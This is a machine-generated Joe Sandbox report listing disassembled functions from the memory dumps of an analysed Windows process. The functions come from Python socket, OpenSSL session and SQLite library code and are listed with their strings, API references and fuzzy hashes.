Instruction ID: 4b299fc42676f1989914d5f5cfc6493b53ecb935ec1544fee7ec89b7b3493807
Opcode Fuzzy Hash: b50fd2007816af9675bff2c5d78056b72218e157b97ee3f7d5316108d01f2432
Instruction Fuzzy Hash: EB21B9A1A18BCB95EB509B18E85047D6361FF84FC8B905432E74EA7574DE3CF915D700

Function 00007FF8B7E5759C Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 29COMMON

Download Yara Rule

APIs

inet_addr.WS2_32 ref: 00007FF8B7E575F0

Strings

s:inet_aton, xrefs: 00007FF8B7E575A8
255.255.255.255, xrefs: 00007FF8B7E575BE
illegal IP address string passed to inet_aton, xrefs: 00007FF8B7E57606

Memory Dump Source

Source File: 00000001.00000002.2485660803.00007FF8B7E51000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B7E50000, based on PE: true

Associated: 00000001.00000002.2485616376.00007FF8B7E50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485660803.00007FF8B7E60000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485660803.00007FF8B7E62000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485660803.00007FF8B7E65000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485822707.00007FF8B7E66000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485861999.00007FF8B7E68000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8b7e50000_Resource.jbxd

Similarity

API ID: inet_addr
String ID: 255.255.255.255$illegal IP address string passed to inet_aton$s:inet_aton
API String ID: 1393076350-4110412280
Opcode ID: c36ba3c4bfb6d99761cb049ede8d1a0476339f8fb6d9f4c6bb1da77d7bfdc654
Instruction ID: 7fb2d1273b4861aa26eb36edc0fe45219c0752915840ec3dd81f086988de33af
Opcode Fuzzy Hash: c36ba3c4bfb6d99761cb049ede8d1a0476339f8fb6d9f4c6bb1da77d7bfdc654
Instruction Fuzzy Hash: 4A01C4A1A08B8B82EB10AB2DE89017D2360EF85FD5F500531D71E975B4DE2CF44AC700

Function 00007FF8B7E57298 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 26networkCOMMON

Download Yara Rule

APIs

htons.WS2_32 ref: 00007FF8B7E572EB

Strings

i:htons, xrefs: 00007FF8B7E572A4
htons: Python int too large to convert to C 16-bit unsigned integer, xrefs: 00007FF8B7E572DF
htons: can't convert negative Python int to C 16-bit unsigned integer, xrefs: 00007FF8B7E572BD

Memory Dump Source

Source File: 00000001.00000002.2485660803.00007FF8B7E51000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B7E50000, based on PE: true

Associated: 00000001.00000002.2485616376.00007FF8B7E50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485660803.00007FF8B7E60000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485660803.00007FF8B7E62000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485660803.00007FF8B7E65000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485822707.00007FF8B7E66000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485861999.00007FF8B7E68000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8b7e50000_Resource.jbxd

Similarity

API ID: htons
String ID: htons: Python int too large to convert to C 16-bit unsigned integer$htons: can't convert negative Python int to C 16-bit unsigned integer$i:htons
API String ID: 4207154920-997571130
Opcode ID: 2691255c54d26faaba9db7ea864a496c1bdf48ccbdf02008ddfa29cb43c5f3bb
Instruction ID: 5e7ebc4d996564cdf88abe4d7ca5f119d730732f0b59e992f354116ed70a509d
Opcode Fuzzy Hash: 2691255c54d26faaba9db7ea864a496c1bdf48ccbdf02008ddfa29cb43c5f3bb
Instruction Fuzzy Hash: 47F0E7E8A087CB91EB048B19E89107D23A0AF49FC5B900431EB4EE75B0DE2CF415D300

Function 00007FF8B7E5791C Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 26networkCOMMON

Download Yara Rule

APIs

htons.WS2_32 ref: 00007FF8B7E5796F

Strings

ntohs: can't convert negative Python int to C 16-bit unsigned integer, xrefs: 00007FF8B7E57941
i:ntohs, xrefs: 00007FF8B7E57928
ntohs: Python int too large to convert to C 16-bit unsigned integer, xrefs: 00007FF8B7E57963

Memory Dump Source

Source File: 00000001.00000002.2485660803.00007FF8B7E51000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B7E50000, based on PE: true

Associated: 00000001.00000002.2485616376.00007FF8B7E50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485660803.00007FF8B7E60000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485660803.00007FF8B7E62000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485660803.00007FF8B7E65000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485822707.00007FF8B7E66000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485861999.00007FF8B7E68000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8b7e50000_Resource.jbxd

Similarity

API ID: htons
String ID: i:ntohs$ntohs: Python int too large to convert to C 16-bit unsigned integer$ntohs: can't convert negative Python int to C 16-bit unsigned integer
API String ID: 4207154920-2476431691
Opcode ID: 1e91b1f94474eeeb88e67a4b4d95ea3a88fd428130b78720843d870d5892d1e7
Instruction ID: 585874c7ecfe4d6407ae0421dd3a745bd5785b171a0610108dc35823ffe8d680
Opcode Fuzzy Hash: 1e91b1f94474eeeb88e67a4b4d95ea3a88fd428130b78720843d870d5892d1e7
Instruction Fuzzy Hash: 04F0E7A0A087CB91EB049B2DE8A117D2360AF45FC5F901432DB4EA65B0DE2CF454D350

Function 00007FF8A92D1A05 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 283COMMON

Download Yara Rule

APIs

00007FF8C61208A0.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FF8A92E10DB

Strings

..\s\ssl\ssl_asn1.c, xrefs: 00007FF8A92E0F4E, 00007FF8A92E0FD3, 00007FF8A92E1014, 00007FF8A92E11B4, 00007FF8A92E122E, 00007FF8A92E127A, 00007FF8A92E12EF
d2i_SSL_SESSION, xrefs: 00007FF8A92E0F42, 00007FF8A92E0FC7, 00007FF8A92E1008, 00007FF8A92E1222

Memory Dump Source

Source File: 00000001.00000002.2484486391.00007FF8A92D1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A92D0000, based on PE: true

Associated: 00000001.00000002.2484439323.00007FF8A92D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A9353000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A9355000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A937D000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A9388000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A9393000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484884597.00007FF8A9397000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2485026823.00007FF8A9398000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8a92d0000_Resource.jbxd

Similarity

API ID: 00007C61208
String ID: ..\s\ssl\ssl_asn1.c$d2i_SSL_SESSION
API String ID: 3535234312-384499812
Opcode ID: 068ff74c5e04d3b22dd643f34b65afc901536cdc3614985e071ae3aafa1cdff7
Instruction ID: 9955df669ff3a8332c22122db79a97d9abe9ac7da7261eeca7131241a6f8991c
Opcode Fuzzy Hash: 068ff74c5e04d3b22dd643f34b65afc901536cdc3614985e071ae3aafa1cdff7
Instruction Fuzzy Hash: CBD12A22A0EBC2A6EB559F29D4C02B837A4FB44BC4F455035DE6D8779AEF38E451C310

Function 00007FF8A92D2130 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 263COMMON

Download Yara Rule

APIs

00007FF8C61208A0.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FF8A92FFA32

Strings

ssl_get_prev_session, xrefs: 00007FF8A92FF9FB, 00007FF8A92FFAA1, 00007FF8A92FFB4E
..\s\ssl\ssl_sess.c, xrefs: 00007FF8A92FFA07, 00007FF8A92FFAAD, 00007FF8A92FFB5A

Memory Dump Source

Source File: 00000001.00000002.2484486391.00007FF8A92D1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A92D0000, based on PE: true

Associated: 00000001.00000002.2484439323.00007FF8A92D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A9353000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A9355000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A937D000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A9388000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A9393000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484884597.00007FF8A9397000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2485026823.00007FF8A9398000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8a92d0000_Resource.jbxd

Similarity

API ID: 00007C61208
String ID: ..\s\ssl\ssl_sess.c$ssl_get_prev_session
API String ID: 3535234312-1331951588
Opcode ID: a9de9a44b05c5c5aa1a5891343337ca6625fea67d96ce4dd5e9b6a7967049d33
Instruction ID: 52c01c4caae7299f180e7529160bd126abe38f246c87a3142a891ff2ffb16dca
Opcode Fuzzy Hash: a9de9a44b05c5c5aa1a5891343337ca6625fea67d96ce4dd5e9b6a7967049d33
Instruction Fuzzy Hash: 7BC17736A0EAD2A2FB649E21D4907EA6764FB84BC8F044031DE5D87A9DCFB8E455C700

Function 00007FF8A880E200 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 163COMMON

Download Yara Rule

APIs

00007FF8BFAB19C0.VCRUNTIME140 ref: 00007FF8A880E40D

Strings

out of memory, xrefs: 00007FF8A880FFBB
too many levels of trigger recursion, xrefs: 00007FF8A880FD3D

Memory Dump Source

Source File: 00000001.00000002.2482929598.00007FF8A87D1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A87D0000, based on PE: true

Associated: 00000001.00000002.2482888201.00007FF8A87D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2482929598.00007FF8A8929000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2482929598.00007FF8A892B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2482929598.00007FF8A8940000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2483220649.00007FF8A8942000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2483263786.00007FF8A8944000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8a87d0000_Resource.jbxd

Similarity

API ID: 00007
String ID: out of memory$too many levels of trigger recursion
API String ID: 3568877910-3387558265
Opcode ID: 2da8eabf17ebf59af3b23f36f8cc1f2aacf79c3bff37746ddbcefc3f1bc563b6
Instruction ID: 2c185f783c78022f25139ed4c43c0d36e7aa77ffe40f7be58e655e0a675b8bb8
Opcode Fuzzy Hash: 2da8eabf17ebf59af3b23f36f8cc1f2aacf79c3bff37746ddbcefc3f1bc563b6
Instruction Fuzzy Hash: 41812876A06B4596DB20CF19E484A6D77F8FB88784F168026DF8D83B60DF38E491CB54

Function 00007FF8A92D1EC4 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 140COMMON

Download Yara Rule

APIs

00007FF8C6126570.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF8A92D9622

Strings

..\s\ssl\d1_srtp.c, xrefs: 00007FF8A92D955A, 00007FF8A92D9651
ssl_ctx_make_profiles, xrefs: 00007FF8A92D954F, 00007FF8A92D9648

Memory Dump Source

Source File: 00000001.00000002.2484486391.00007FF8A92D1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A92D0000, based on PE: true

Associated: 00000001.00000002.2484439323.00007FF8A92D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A9353000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A9355000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A937D000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A9388000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A9393000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484884597.00007FF8A9397000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2485026823.00007FF8A9398000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8a92d0000_Resource.jbxd

Similarity

API ID: 00007C6126570
String ID: ..\s\ssl\d1_srtp.c$ssl_ctx_make_profiles
API String ID: 800424832-118859582
Opcode ID: 90190809f3ff2b9e311badaabc1ebba587b11eb84eb6526a93bc4e6942bb04aa
Instruction ID: 04c3645696bf6928a681706f95ab37cde83a3d0dfc71b10ee0bc498987aa35f5
Opcode Fuzzy Hash: 90190809f3ff2b9e311badaabc1ebba587b11eb84eb6526a93bc4e6942bb04aa
Instruction Fuzzy Hash: FD51C629F0F6C266FA509F55A8003B962A4EF85BC4F559031EE1DC779AEE7DE442C700

Function 00007FF8A882F6F0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 102COMMON

Download Yara Rule

APIs

00007FF8BFAB19C0.VCRUNTIME140 ref: 00007FF8A882F7CE

Strings

sqlite_returning, xrefs: 00007FF8A882F807
cannot use RETURNING in a trigger, xrefs: 00007FF8A882F717

Memory Dump Source

Source File: 00000001.00000002.2482929598.00007FF8A87D1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A87D0000, based on PE: true

Associated: 00000001.00000002.2482888201.00007FF8A87D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2482929598.00007FF8A8929000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2482929598.00007FF8A892B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2482929598.00007FF8A8940000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2483220649.00007FF8A8942000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2483263786.00007FF8A8944000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8a87d0000_Resource.jbxd

Similarity

API ID: 00007
String ID: cannot use RETURNING in a trigger$sqlite_returning
API String ID: 3568877910-753984552
Opcode ID: f216d0c8bbd83873740a022ecc0147a64b7e9b42c70e3bbce07e6aa7554d4310
Instruction ID: 6f34ed65451d937d4e3195eb246d848c12cc37dc901d17e3bb4962fb1c8f6c24
Opcode Fuzzy Hash: f216d0c8bbd83873740a022ecc0147a64b7e9b42c70e3bbce07e6aa7554d4310
Instruction Fuzzy Hash: C3416D36B0AB81A6E7789B25E5403B973A0FB48BC1F444071CB9E07755DF38E461CB15

Function 00007FF8B7DF36C0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 101COMMON

Download Yara Rule

APIs

00007FF8C6126570.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF8B7DF3730

Strings

_constructors, xrefs: 00007FF8B7DF37BB
openssl_, xrefs: 00007FF8B7DF3726

Memory Dump Source

Source File: 00000001.00000002.2485119166.00007FF8B7DF1000.00000040.00000001.01000000.00000011.sdmp, Offset: 00007FF8B7DF0000, based on PE: true

Associated: 00000001.00000002.2485076175.00007FF8B7DF0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2485119166.00007FF8B7DFE000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2485119166.00007FF8B7E01000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2485250154.00007FF8B7E02000.00000080.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2485286720.00007FF8B7E03000.00000004.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8b7df0000_Resource.jbxd

Similarity

API ID: 00007C6126570
String ID: _constructors$openssl_
API String ID: 800424832-3359357282
Opcode ID: fdbd83122f0dac6fa34e242b90a95b765f46311265684fcaef058b369bd0f759
Instruction ID: dc9a299f12cd0a06498194a1c8774421a2c9511805a1d6b7bdee6ed98500e859
Opcode Fuzzy Hash: fdbd83122f0dac6fa34e242b90a95b765f46311265684fcaef058b369bd0f759
Instruction Fuzzy Hash: 57411D65A09B4381EA558B6EA8541BD23A0BF4ABE1B4D4235DF5E0E77CEF3CE4458380

Function 00007FF8A92FDDC0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 89COMMON

Download Yara Rule

Strings

SSL_SESSION_new, xrefs: 00007FF8A92FDE0D, 00007FF8A92FDEC2
..\s\ssl\ssl_sess.c, xrefs: 00007FF8A92FDDEF, 00007FF8A92FDE19, 00007FF8A92FDECE, 00007FF8A92FDF1D

Memory Dump Source

Source File: 00000001.00000002.2484486391.00007FF8A92D1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A92D0000, based on PE: true

Associated: 00000001.00000002.2484439323.00007FF8A92D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A9353000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A9355000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A937D000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A9388000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A9393000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484884597.00007FF8A9397000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2485026823.00007FF8A9398000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8a92d0000_Resource.jbxd

Similarity

API ID:
String ID: ..\s\ssl\ssl_sess.c$SSL_SESSION_new
API String ID: 0-402823876
Opcode ID: 3e6586d1590c5e37fe5a7cb55c6f6f0f2fce94f93ce1c7229bf9571863312e5a
Instruction ID: 575c64fcf1165c1cf7932d8e0fadfd63ce44d438e242705976532b2ebad96681
Opcode Fuzzy Hash: 3e6586d1590c5e37fe5a7cb55c6f6f0f2fce94f93ce1c7229bf9571863312e5a
Instruction Fuzzy Hash: 6F419A25A1EAC2A2FB44AF21D8517E962E0FFC87C4F855036EA0C8779ADF7CE1418700

Function 00007FF8B7DF5DD0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71COMMON

Download Yara Rule

APIs

00007FF8A82A4110.LIBCRYPTO-3 ref: 00007FF8B7DF5EA3

Strings

msg is too long., xrefs: 00007FF8B7DF5E47
key is too long., xrefs: 00007FF8B7DF5E1F

Memory Dump Source

Source File: 00000001.00000002.2485119166.00007FF8B7DF1000.00000040.00000001.01000000.00000011.sdmp, Offset: 00007FF8B7DF0000, based on PE: true

Associated: 00000001.00000002.2485076175.00007FF8B7DF0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2485119166.00007FF8B7DFE000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2485119166.00007FF8B7E01000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2485250154.00007FF8B7E02000.00000080.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2485286720.00007FF8B7E03000.00000004.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8b7df0000_Resource.jbxd

Similarity

API ID: 00007A4110
String ID: key is too long.$msg is too long.
API String ID: 1315851536-4266787399
Opcode ID: 063dfc5a6e16dcd6737886e3f8c9b3bd8e287232609a3123cf02d133cf752103
Instruction ID: d164eb4e59abdde971d9a6796a4523a4bae45a0fe49453e7b24f2925a5ab8a92
Opcode Fuzzy Hash: 063dfc5a6e16dcd6737886e3f8c9b3bd8e287232609a3123cf02d133cf752103
Instruction Fuzzy Hash: C9310C62A08B8282EA10DB15E8503BD63A0FB89BD4F595335DE5E4AB68DF3CE595C700

Function 00007FF8A92D85B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32 ref: 00007FF8A92D85FD
SystemTimeToFileTime.KERNEL32 ref: 00007FF8A92D860D

Strings

gfff, xrefs: 00007FF8A92D863F

Memory Dump Source

Source File: 00000001.00000002.2484486391.00007FF8A92D1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A92D0000, based on PE: true

Associated: 00000001.00000002.2484439323.00007FF8A92D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A9353000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A9355000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A937D000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A9388000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A9393000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484884597.00007FF8A9397000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2485026823.00007FF8A9398000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8a92d0000_Resource.jbxd

Similarity

API ID: Time$System$File
String ID: gfff
API String ID: 2838179519-1553575800
Opcode ID: 5530e0db4563f3136961ddcacea572fb8f4abfde4476f4fcd83b7edc0dcc1c0e
Instruction ID: 4ffdc91b3df20a81d462d05ac4afc897d13b5d2ee66091061d43b140310b4454
Opcode Fuzzy Hash: 5530e0db4563f3136961ddcacea572fb8f4abfde4476f4fcd83b7edc0dcc1c0e
Instruction Fuzzy Hash: 8E21A572A0D6C696EB94CF29D8003B976E8EB88BD4F449035DA5DCB799DE7CD1408B40

Function 00007FF8A92D8FD0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(?,00007FF8A92D8892), ref: 00007FF8A92D8FF6
SystemTimeToFileTime.KERNEL32(?,00007FF8A92D8892), ref: 00007FF8A92D9006

Strings

gfff, xrefs: 00007FF8A92D903A

Memory Dump Source

Source File: 00000001.00000002.2484486391.00007FF8A92D1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A92D0000, based on PE: true

Associated: 00000001.00000002.2484439323.00007FF8A92D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A9353000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A9355000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A937D000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A9388000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A9393000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484884597.00007FF8A9397000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2485026823.00007FF8A9398000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8a92d0000_Resource.jbxd

Similarity

API ID: Time$System$File
String ID: gfff
API String ID: 2838179519-1553575800
Opcode ID: 67d5b2b245d6d65e2ef5cc5c305487d292cfc8c0b311219f02d73a446867e23b
Instruction ID: efc43dd88305754dbfa29b6e507cc383ab8e63119737a36e3d8ee5d2e465f8be
Opcode Fuzzy Hash: 67d5b2b245d6d65e2ef5cc5c305487d292cfc8c0b311219f02d73a446867e23b
Instruction Fuzzy Hash: 91012BE2B1998552EB64DF25F80115567E0FBCC7C4B44D032E65DCBB59EE2CD1018700

Function 00007FF8B7E56FEC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32COMMON

Download Yara Rule

APIs

getprotobyname.WS2_32 ref: 00007FF8B7E57025

Strings

protocol not found, xrefs: 00007FF8B7E57048
s:getprotobyname, xrefs: 00007FF8B7E56FF8

Memory Dump Source

Source File: 00000001.00000002.2485660803.00007FF8B7E51000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B7E50000, based on PE: true

Associated: 00000001.00000002.2485616376.00007FF8B7E50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485660803.00007FF8B7E60000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485660803.00007FF8B7E62000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485660803.00007FF8B7E65000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485822707.00007FF8B7E66000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485861999.00007FF8B7E68000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8b7e50000_Resource.jbxd

Similarity

API ID: getprotobyname
String ID: protocol not found$s:getprotobyname
API String ID: 402843736-630402058
Opcode ID: ac4d7443135ec3fd7d6ef97bafa26f56281c3eb87892640fc47bc7d9a40971c8
Instruction ID: 28cfde71085612df4403a8f41865402385e6fd5bd04826cf3063898b305c645f
Opcode Fuzzy Hash: ac4d7443135ec3fd7d6ef97bafa26f56281c3eb87892640fc47bc7d9a40971c8
Instruction Fuzzy Hash: 810104A5A19B8A82EB049B19E99403E63A0FF88FD5F541031DB4E63634DF3CF054C300

Function 00007FF8B7E5751C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32COMMON

Download Yara Rule

APIs

if_nametoindex.IPHLPAPI ref: 00007FF8B7E57552

Strings

O&:if_nametoindex, xrefs: 00007FF8B7E5752F
no interface with this name, xrefs: 00007FF8B7E57576

Memory Dump Source

Source File: 00000001.00000002.2485660803.00007FF8B7E51000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B7E50000, based on PE: true

Associated: 00000001.00000002.2485616376.00007FF8B7E50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485660803.00007FF8B7E60000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485660803.00007FF8B7E62000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485660803.00007FF8B7E65000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485822707.00007FF8B7E66000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485861999.00007FF8B7E68000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8b7e50000_Resource.jbxd

Similarity

API ID: if_nametoindex
String ID: O&:if_nametoindex$no interface with this name
API String ID: 3183282855-3835682882
Opcode ID: 96cc5bbd212ee31c6da8f769fa9eb41f3bd4693fa012e78c2a94fee3505b7c80
Instruction ID: f8b45983961ed50c45e69bae653e185d10d89dc1bdc6d6d7665d0739244d37bd
Opcode Fuzzy Hash: 96cc5bbd212ee31c6da8f769fa9eb41f3bd4693fa012e78c2a94fee3505b7c80
Instruction Fuzzy Hash: 1301E8E1A0CB8B82EB109B29E89107D2360BF88FC9B500431DB4EA7234DE3CF459C710

Function 00007FF8B7E5761C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 29COMMON

Download Yara Rule

APIs

inet_ntoa.WS2_32 ref: 00007FF8B7E57680

Strings

y*:inet_ntoa, xrefs: 00007FF8B7E57628
packed IP wrong length for inet_ntoa, xrefs: 00007FF8B7E57648

Memory Dump Source

Source File: 00000001.00000002.2485660803.00007FF8B7E51000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B7E50000, based on PE: true

Associated: 00000001.00000002.2485616376.00007FF8B7E50000.00000002.00000001.01000000.0000000C.sdmpDownload File
